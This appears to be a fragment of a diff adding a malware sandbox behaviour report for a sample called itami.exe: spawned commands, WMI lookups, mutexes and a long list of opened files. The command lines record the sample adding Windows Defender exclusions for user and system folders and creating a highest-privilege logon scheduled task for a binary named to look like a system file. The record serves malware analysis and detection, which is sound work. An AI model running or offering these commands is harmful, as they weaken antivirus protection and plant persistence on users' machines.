+    "cmd /c powershell -Command Add-MpPreference -ExclusionPath %UserProfile% & powershell -Command Add-MpPreference -ExclusionPath %AppData% & powershell -Command Add-MpPreference -ExclusionPath %Temp% & powershell -Command Add-MpPreference -ExclusionPath %SystemRoot% & exit",
+    "C:\\Windows\\system32\\services64.exe",
+    "2688 - \"cmd\" /c powershell -Command Add-MpPreference -ExclusionPath '%%UserProfile%%' & powershell -Command Add-MpPreference -ExclusionPath '%%AppData%%' & powershell -Command Add-MpPreference -ExclusionPath '%%Temp%%' & powershell -Command Add-MpPreference -ExclusionPath '%%SystemRoot%%' & exit",
+    "2752 - powershell  -Command Add-MpPreference -ExclusionPath 'C:\\Users\\admin' ",
+    "2180 - powershell  -Command Add-MpPreference -ExclusionPath 'C:\\Users\\admin\\AppData\\Roaming' ",
+    "1472 - \"C:\\Windows\\System32\\cmd.exe\" /c C:\\Users\\admin\\AppData\\Local\\Temp\\svchost64.exe \"C:\\Users\\admin\\Downloads\\itami.exe\"",
+    "2788 - C:\\Users\\admin\\AppData\\Local\\Temp\\svchost64.exe  \"C:\\Users\\admin\\Downloads\\itami.exe\"",
+    "2400 - powershell  -Command Add-MpPreference -ExclusionPath 'C:\\Users\\admin\\AppData\\Local\\Temp' ",
+    "1652 - \"C:\\Windows\\System32\\cmd.exe\" /c schtasks /create /f /sc onlogon /rl highest /tn \"services64\" /tr '\"C:\\Windows\\system32\\services64.exe\"' & exit",
+    "772 - schtasks  /create /f /sc onlogon /rl highest /tn \"services64\" /tr '\"C:\\Windows\\system32\\services64.exe\"' ",
+    "2892 - \"C:\\Windows\\system32\\services64.exe\" "
+  ],
+  "system_property_lookups": [
+    "Select CommandLine from Win32_Process where Name='explorer.exe'",
+    "IWbemServices::Connect",
+    "MI_Session::Invoke",
+    "IWbemServices::ExecMethod - root\\Microsoft\\Windows\\Defender : MSFT_MpPreference::Add"
+  ],
+  "mutexes_created": [
+    "\\Sessions\\1\\BaseNamedObjects\\Global\\SyncRootManager",
+    "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex",
+    "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"
+  ],
+  "files_opened": [
+    "<Anonymous Pipe>",
+    "\\PSHost.132777415785472896.1992.DefaultAppDomain.powershell",
+    "\\PSHost.132777415837521828.3016.DefaultAppDomain.powershell",
+    "\\PSHost.132777415851398394.2112.DefaultAppDomain.powershell",
+    "\\PSHost.132777415864769081.2464.DefaultAppDomain.powershell",
+    "\\PSHost.132777415972973135.1692.DefaultAppDomain.powershell",
+    "\\PSHost.132777415989514431.3752.DefaultAppDomain.powershell",
+    "\\PSHost.132777416005653790.2828.DefaultAppDomain.powershell",
+    "\\PSHost.132777416019138289.2508.DefaultAppDomain.powershell",
+    "C:\\Windows\\SYSTEM32\\MSCOREE.DLL.local",
+    "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\",
+    "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscoreei.dll",
+    "C:\\Windows\\Microsoft.NET\\Framework64\\",
+    "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\clr.dll",
+    "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorwks.dll",
+    "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\clr.dll",
+    "C:\\Users\\<USER>\\Downloads\\itami.exe.config",
+    "C:\\Users\\<USER>\\Downloads\\itami.exe",
+    "C:\\Windows\\system32\\VERSION.dll",
+    "C:\\Windows\\system32\\VCRUNTIME140_CLR0400.dll",
+    "C:\\Windows\\system32\\ucrtbase_clr0400.dll",
+    "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\config\\machine.config",
+    "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\fusion.localgac",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\mscorlib\\",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\mscorlib\\fe2524177eb3088c77be666722039f52\\mscorlib.ni.dll",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\mscorlib\\fe2524177eb3088c77be666722039f52\\mscorlib.ni.dll.aux",
+    "C:\\Users\\",
+    "C:\\Users\\<USER>\\Downloads\\",
+    "C:\\Users\\<USER>\\",
+    "C:\\Windows\\system32\\rpcss.dll",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\itami\\",
+    "C:\\Users\\<USER>\\Downloads\\itami.INI",
+    "C:\\Windows\\system32\\api-ms-win-core-xstate-l2-1-0.dll",
+    "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\clrjit.dll",
+    "C:\\Windows\\assembly\\pubpol24.dat",
+    "C:\\Windows\\assembly\\GAC\\PublisherPolicy.tme",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\e43dd9c73ab5615e461bf5109c3facd6\\System.ni.dll",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\e43dd9c73ab5615e461bf5109c3facd6\\System.ni.dll.aux",
+    "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\nlssorting.dll",
+    "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\SortDefault.nlp",
+    "C:\\Windows\\system32\\bcrypt.dll",
+    "C:\\Users\\admin",
+    "C:\\Users\\<USER>\\AppData\\Roaming",
+    "C:\\Users\\Default\\AppData\\Roaming",
+    "C:\\Windows\\system32\\CRYPTSP.dll",
+    "C:\\Windows\\system32\\rsaenh.dll",
+    "\\Device\\NamedPipe\\",
+    "C:\\Users\\<USER>\\Downloads",
+    "C:\\Windows\\system32\\cmd.exe",
+    "C:\\Windows\\system32\\apphelp.dll",
+    "C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\",
+    "C:\\Windows\\system32\\",
+    "C:\\Windows\\",
+    "C:\\Windows\\System32\\Wbem\\",
+    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\",
+    "C:\\Windows\\system32\\mscoree.dll.local",
+    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pb378ec07#\\",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pb378ec07#\\b0fcf106681758b7af5211cc1367fc8e\\Microsoft.PowerShell.ConsoleHost.ni.dll",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pb378ec07#\\b0fcf106681758b7af5211cc1367fc8e\\Microsoft.PowerShell.ConsoleHost.ni.dll.aux",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Core\\",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Core\\0d59b0e237d7519417de10cd84bda4e7\\System.Core.ni.dll",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Core\\0d59b0e237d7519417de10cd84bda4e7\\System.Core.ni.dll.aux",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\08a991e54142198a258c6c3824708d25\\System.Management.Automation.ni.dll",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\08a991e54142198a258c6c3824708d25\\System.Management.Automation.ni.dll.aux",
+    "C:\\Windows\\assembly\\GAC_64\\System.Management.Automation.resources\\3.0.0.0_en-US_31bf3856ad364e35\\System.Management.Automation.resources.dll",
+    "C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation.resources\\3.0.0.0_en-US_31bf3856ad364e35\\System.Management.Automation.resources.dll",
+    "C:\\Windows\\assembly\\GAC\\System.Management.Automation.resources\\3.0.0.0_en-US_31bf3856ad364e35\\System.Management.Automation.resources.dll",
+    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\System.Management.Automation.resources.dll",
+    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\System.Management.Automation.resources\\System.Management.Automation.resources.dll",
+    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\System.Management.Automation.resources.exe",
+    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\System.Management.Automation.resources\\System.Management.Automation.resources.exe",
+    "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorrc.dll",
+    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
+    "C:\\Windows\\system32\\en-US\\KERNELBASE.dll.mui",
+    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1",
+    "C:\\Windows\\system32",
+    "C:\\Windows\\SysWOW64",
+    "C:\\Program Files",
+    "C:\\Windows\\system32\\MSISIP.DLL",
+    "C:\\Windows\\system32\\wshext.dll",
+    "C:\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_a4d981ff711297b6",
+    "C:\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.18837_none_a4d981ff711297b6\\COMCTL32.dll",
+    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\pwrshsip.dll",
+    "C:\\Windows\\assembly\\GAC_64\\Microsoft.PowerShell.ConsoleHost.resources\\3.0.0.0_en-US_31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.resources.dll",
+    "C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost.resources\\3.0.0.0_en-US_31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.resources.dll",
+    "C:\\Windows\\assembly\\GAC\\Microsoft.PowerShell.ConsoleHost.resources\\3.0.0.0_en-US_31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.resources.dll",
+    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\Microsoft.PowerShell.ConsoleHost.resources.dll",
+    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\Microsoft.PowerShell.ConsoleHost.resources\\Microsoft.PowerShell.ConsoleHost.resources.dll",
+    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\Microsoft.PowerShell.ConsoleHost.resources.exe",
+    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\Microsoft.PowerShell.ConsoleHost.resources\\Microsoft.PowerShell.ConsoleHost.resources.exe",
+    "CONOUT$",
+    "C:\\Users\\<USER>\\AppData\\Local",
+    "C:\\Users\\<USER>\\AppData\\Local\\Microsoft\\Windows\\PowerShell",
+    "C:\\Users\\<USER>\\AppData\\Local\\Microsoft\\Windows",
+    "C:\\Users\\<USER>\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\StartupProfileData-NonInteractive",
+    "C:\\Windows\\system32\\tzres.dll",
+    "C:\\Windows\\system32\\en-US\\tzres.dll.mui",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Data\\",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Data\\7bed49c46de9295a8453db205c60a028\\System.Data.ni.dll",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Data\\7bed49c46de9295a8453db205c60a028\\System.Data.ni.dll.aux",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Xml\\",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Xml\\5ee35debfc22f727e70e4479ddcbc045\\System.Xml.ni.dll",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Xml\\5ee35debfc22f727e70e4479ddcbc045\\System.Xml.ni.dll.aux",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Management\\",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Management\\b221af81285c1305324612e6dc9c88ff\\System.Management.ni.dll",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Management\\b221af81285c1305324612e6dc9c88ff\\System.Management.ni.dll.aux",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Dired13b18a9#\\",
+    "C:\\Program Files (x86)\\Common Files\\Oracle\\Java\\javapath\\",
+    "C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\",
+    "C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\",
+    "C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PackageManagement\\",
+    "C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\Pester\\",
+    "C:\\Program Files (x86)\\WindowsPowerShell\\Modules\\PowerShellGet\\",
+    "C:\\Program Files\\WindowsPowerShell\\Modules\\",
+    "C:\\Program Files\\WindowsPowerShell\\Modules\\Microsoft.PowerShell.Operation.Validation\\",
+    "C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\",
+    "C:\\Program Files\\WindowsPowerShell\\Modules\\PackageManagement\\",
+    "C:\\Program Files\\WindowsPowerShell\\Modules\\Pester\\",
+    "C:\\Program Files\\WindowsPowerShell\\Modules\\PowerShellGet\\",
+    "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2102.4-0\\MPCLIENT.DLL",
+    "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2102.4-0\\MpOav.dll",
+    "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.2102.4-0\\MsMpLics.dll",
+    "C:\\ProgramData\\chocolatey\\bin\\",
+    "C:\\Users\\user\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\itami.exe.log",
+    "C:\\Users\\user\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\services64.exe.log",
+    "C:\\Users\\user\\AppData\\Local\\Microsoft\\CLR_v4.0\\UsageLogs\\svchost64.exe.log",
+    "C:\\Users\\user\\AppData\\Local\\Microsoft\\WindowsApps\\",
+    "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Caches",
+    "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db",
+    "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000016.db",
+    "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\ModuleAnalysisCache",
+    "C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\StartupProfileData-NonInteractive",
+    "C:\\Users\\user\\AppData\\Local\\Programs\\Python\\Python39\\",
+    "C:\\Users\\user\\AppData\\Local\\Programs\\Python\\Python39\\Scripts\\",
+    "C:\\Users\\user\\AppData\\Local\\Temp",
+    "C:\\Users\\user\\AppData\\Local\\Temp\\",
+    "C:\\Users\\user\\AppData\\Local\\Temp\\JSAMSIProvider64.dll",
+    "C:\\Users\\user\\AppData\\Local\\Temp\\__PSScriptPolicyTest_dezdqqbs.0iy.ps1",
+    "C:\\Users\\user\\AppData\\Local\\Temp\\__PSScriptPolicyTest_dezdqqbs.0iy.ps1\\",
+    "C:\\Users\\user\\AppData\\Local\\Temp\\__PSScriptPolicyTest_ehwww3j4.nwj.ps1",
+    "C:\\Users\\user\\AppData\\Local\\Temp\\__PSScriptPolicyTest_ehwww3j4.nwj.ps1\\",
+    "C:\\Users\\user\\AppData\\Local\\Temp\\__PSScriptPolicyTest_ksnrixfy.zsj.psm1",
+    "C:\\Users\\user\\AppData\\Local\\Temp\\__PSScriptPolicyTest_mpnen4uo.0jd.psm1",
+    "C:\\Users\\user\\AppData\\Local\\Temp\\__PSScriptPolicyTest_urbqvbub.fom.ps1",
+    "C:\\Users\\user\\AppData\\Local\\Temp\\__PSScriptPolicyTest_urbqvbub.fom.ps1\\",
+    "C:\\Users\\user\\AppData\\Local\\Temp\\__PSScriptPolicyTest_z2p22j2q.23w.psm1",
+    "C:\\Users\\user\\AppData\\Local\\Temp\\svchost64.exe",
+    "C:\\Users\\user\\AppData\\Local\\Temp\\svchost64.exe.config",
+    "C:\\Users\\user\\Desktop\\desktop.ini",
+    "C:\\Users\\user\\Desktop\\itami.exe",
+    "C:\\Users\\user\\Desktop\\itami.exe.config",
+    "C:\\Users\\user\\Desktop\\itami.exe:Zone.Identifier",
+    "C:\\Users\\user\\Desktop\\itami.exe\\:Zone.Identifier:$DATA",
+    "C:\\Users\\user\\Documents\\desktop.ini",
+    "C:\\Users\\user\\Downloads\\desktop.ini",
+    "C:\\Users\\user\\Music\\desktop.ini",
+    "C:\\Users\\user\\OneDrive\\desktop.ini",
+    "C:\\Users\\user\\Pictures\\desktop.ini",
+    "C:\\Users\\user\\Videos\\desktop.ini",
+    "C:\\Windows\\AppPatch\\sysmain.sdb",
+    "C:\\Windows\\Globalization\\Sorting\\sortdefault.nls",
+    "C:\\Windows\\Microsoft.NET\\Framework64\\",
+    "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\clr.dll",
+    "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorwks.dll",
+    "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\",
+    "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Config\\machine.config",
+    "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\clr.dll",
+    "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\clrjit.dll",
+    "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\config\\machine.config",
+    "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscoreei.dll",
+    "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorrc.dll",
+    "C:\\Windows\\Microsoft.Net\\assembly\\GAC_64\\System.Data\\v4.0_4.0.0.0__b77a5c561934e089\\System.Data.dll",
+    "C:\\Windows\\Microsoft.Net\\assembly\\GAC_64\\System.Data\\v4.0_4.0.0.0__b77a5c561934e089\\System.Data.dll.config",
+    "C:\\Windows\\Microsoft.Net\\assembly\\GAC_64\\System.Transactions\\v4.0_4.0.0.0__b77a5c561934e089\\System.Transactions.dll",
+    "C:\\Windows\\Microsoft.Net\\assembly\\GAC_64\\System.Transactions\\v4.0_4.0.0.0__b77a5c561934e089\\System.Transactions.dll.config",
+    "C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.IO.Compression\\v4.0_4.0.0.0__b77a5c561934e089\\System.IO.Compression.dll",
+    "C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll",
+    "C:\\Windows\\SYSTEM32\\ATL.DLL",
+    "C:\\Windows\\SYSTEM32\\CLDAPI.dll",
+    "C:\\Windows\\SYSTEM32\\CRYPTBASE.dll",
+    "C:\\Windows\\SYSTEM32\\CRYPTSP.dll",
+    "C:\\Windows\\SYSTEM32\\DPAPI.DLL",
+    "C:\\Windows\\SYSTEM32\\MSCOREE.DLL",
+    "C:\\Windows\\SYSTEM32\\Microsoft.Management.Infrastructure.Native.Unmanaged.DLL",
+    "C:\\Windows\\SYSTEM32\\OpcServices.DLL",
+    "C:\\Windows\\SYSTEM32\\PROPSYS.dll",
+    "C:\\Windows\\SYSTEM32\\SSPICLI.DLL",
+    "C:\\Windows\\SYSTEM32\\SspiCli.dll",
+    "C:\\Windows\\SYSTEM32\\USERENV.dll",
+    "C:\\Windows\\SYSTEM32\\VCRUNTIME140_CLR0400.dll",
+    "C:\\Windows\\SYSTEM32\\VERSION.dll",
+    "C:\\Windows\\SYSTEM32\\XmlLite.dll",
+    "C:\\Windows\\SYSTEM32\\amsi.dll",
+    "C:\\Windows\\SYSTEM32\\apphelp.dll",
+    "C:\\Windows\\SYSTEM32\\bcrypt.dll",
+    "C:\\Windows\\SYSTEM32\\cmd.exe",
+    "C:\\Windows\\SYSTEM32\\edputil.dll",
+    "C:\\Windows\\SYSTEM32\\en-US\\PROPSYS.dll.mui",
+    "C:\\Windows\\SYSTEM32\\en-US\\cmd.exe.mui",
+    "C:\\Windows\\SYSTEM32\\en-US\\tzres.dll.mui",
+    "C:\\Windows\\SYSTEM32\\en-US\\winnlsres.dll.mui",
+    "C:\\Windows\\SYSTEM32\\gpapi.dll",
+    "C:\\Windows\\SYSTEM32\\iertutil.dll",
+    "C:\\Windows\\SYSTEM32\\mi.dll",
+    "C:\\Windows\\SYSTEM32\\mintdh.DLL",
+    "C:\\Windows\\SYSTEM32\\mintdh.dll",
+    "C:\\Windows\\SYSTEM32\\miutils.dll",
+    "C:\\Windows\\SYSTEM32\\mscoree.dll",
+    "C:\\Windows\\SYSTEM32\\ntdll.dll",
+    "C:\\Windows\\SYSTEM32\\ntmarta.dll",
+    "C:\\Windows\\SYSTEM32\\ole32.dll",
+    "C:\\Windows\\SYSTEM32\\secur32.dll",
+    "C:\\Windows\\SYSTEM32\\tdh.dll",
+    "C:\\Windows\\SYSTEM32\\tzres.dll",
+    "C:\\Windows\\SYSTEM32\\ucrtbase_clr0400.dll",
+    "C:\\Windows\\SYSTEM32\\urlmon.dll",
+    "C:\\Windows\\SYSTEM32\\wbemcomn.dll",
+    "C:\\Windows\\SYSTEM32\\winnlsres.dll",
+    "C:\\Windows\\SYSTEM32\\wldp.dll",
+    "C:\\Windows\\System32",
+    "C:\\Windows\\System32\\",
+    "C:\\Windows\\System32\\AppLocker\\MDM",
+    "C:\\Windows\\System32\\AppxSip.dll",
+    "C:\\Windows\\System32\\KERNEL32.dll",
+    "C:\\Windows\\System32\\KERNELBASE.dll",
+    "C:\\Windows\\System32\\MSISIP.DLL",
+    "C:\\Windows\\System32\\OneCoreUAPCommonProxyStub.dll",
+    "C:\\Windows\\System32\\OpenSSH\\",
+    "C:\\Windows\\System32\\SspiCli.dll",
+    "C:\\Windows\\System32\\Wbem\\",
+    "C:\\Windows\\System32\\WinTypes.dll",
+    "C:\\Windows\\System32\\Windows.StateRepositoryPS.dll",
+    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\",
+    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\ConfigDefender\\ConfigDefender.psd1",
+    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\ConfigDefender\\MSFT_MpComputerStatus.cdxml",
+    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\ConfigDefender\\MSFT_MpPreference.cdxml",
+    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\ConfigDefender\\MSFT_MpScan.cdxml",
+    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\ConfigDefender\\MSFT_MpSignature.cdxml",
+    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\ConfigDefender\\MSFT_MpThreat.cdxml",
+    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\ConfigDefender\\MSFT_MpThreatCatalog.cdxml",
+    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\ConfigDefender\\MSFT_MpThreatDetection.cdxml",
+    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\ConfigDefender\\MSFT_MpWDOScan.cdxml",
+    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1",
+    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\en-US\\powershell.exe.mui",
+    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.Config",
+    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config",
+    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\pwrshsip.dll",
+    "C:\\Windows\\System32\\XmlLite.dll",
+    "C:\\Windows\\System32\\cmd.exe",
+    "C:\\Windows\\System32\\en-US\\CRYPT32.dll.mui",
+    "C:\\Windows\\System32\\en-US\\cmd.exe.mui",
+    "C:\\Windows\\System32\\en-US\\user32.dll.mui",
+    "C:\\Windows\\System32\\services64.exe:Zone.Identifier",
+    "C:\\Windows\\System32\\taskschd.dll",
+    "C:\\Windows\\System32\\wshext.dll",
+    "C:\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.1304_none_d3fbe61b7c93d9f0",
+    "C:\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.1304_none_d3fbe61b7c93d9f0\\comctl32.DLL",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.M870d558a#\\",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.M870d558a#\\693872fe61faf634359e9c5808ee0222\\Microsoft.Management.Infrastructure.Native.ni.dll",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.M870d558a#\\693872fe61faf634359e9c5808ee0222\\Microsoft.Management.Infrastructure.Native.ni.dll.aux",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Mf49f6405#\\",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Mf49f6405#\\e5c9865ceab3d51e44db885cd3377ee0\\Microsoft.Management.Infrastructure.ni.dll",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Mf49f6405#\\e5c9865ceab3d51e44db885cd3377ee0\\Microsoft.Management.Infrastructure.ni.dll.aux",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P6f792626#\\",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P6f792626#\\4b6994043bbc39d9e47433716afb9e98\\Microsoft.PowerShell.Security.ni.dll",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.P6f792626#\\4b6994043bbc39d9e47433716afb9e98\\Microsoft.PowerShell.Security.ni.dll.aux",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\a78370d535d159d2691edea0727e654d\\Microsoft.PowerShell.Commands.Management.ni.dll",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\a78370d535d159d2691edea0727e654d\\Microsoft.PowerShell.Commands.Management.ni.dll.aux",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pb378ec07#\\",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pb378ec07#\\dac77e2bdc0040a1a2a446cbf77b6bae\\Microsoft.PowerShell.ConsoleHost.ni.dll",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pb378ec07#\\dac77e2bdc0040a1a2a446cbf77b6bae\\Microsoft.PowerShell.ConsoleHost.ni.dll.aux",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Configuration\\",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Configuration\\b5152c3c02957bbe4459505a39afde20\\System.Configuration.ni.dll",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Configuration\\b5152c3c02957bbe4459505a39afde20\\System.Configuration.ni.dll.aux",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Core\\",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Core\\89bc329e8c65a9e13067c9776d925d78\\System.Core.ni.dll",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Core\\89bc329e8c65a9e13067c9776d925d78\\System.Core.ni.dll.aux",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Data\\",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Data\\dcffb1d4b51a427f7c054b15597ef269\\System.Data.ni.dll",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Data\\dcffb1d4b51a427f7c054b15597ef269\\System.Data.ni.dll.aux",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Dired13b18a9#\\",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Dired13b18a9#\\4ac88f62ef161467f8e9dd4985837e51\\System.DirectoryServices.ni.dll",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Dired13b18a9#\\4ac88f62ef161467f8e9dd4985837e51\\System.DirectoryServices.ni.dll.aux",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.IO.Cb3b124c8#\\",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\f02732d562721457afde5c189a906d17\\System.Management.Automation.ni.dll",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\f02732d562721457afde5c189a906d17\\System.Management.Automation.ni.dll.aux",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Management\\",
+    "C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Management\\dee95ca75ccebe1cc18b31dca334cd53\\System.Management.ni.dll",
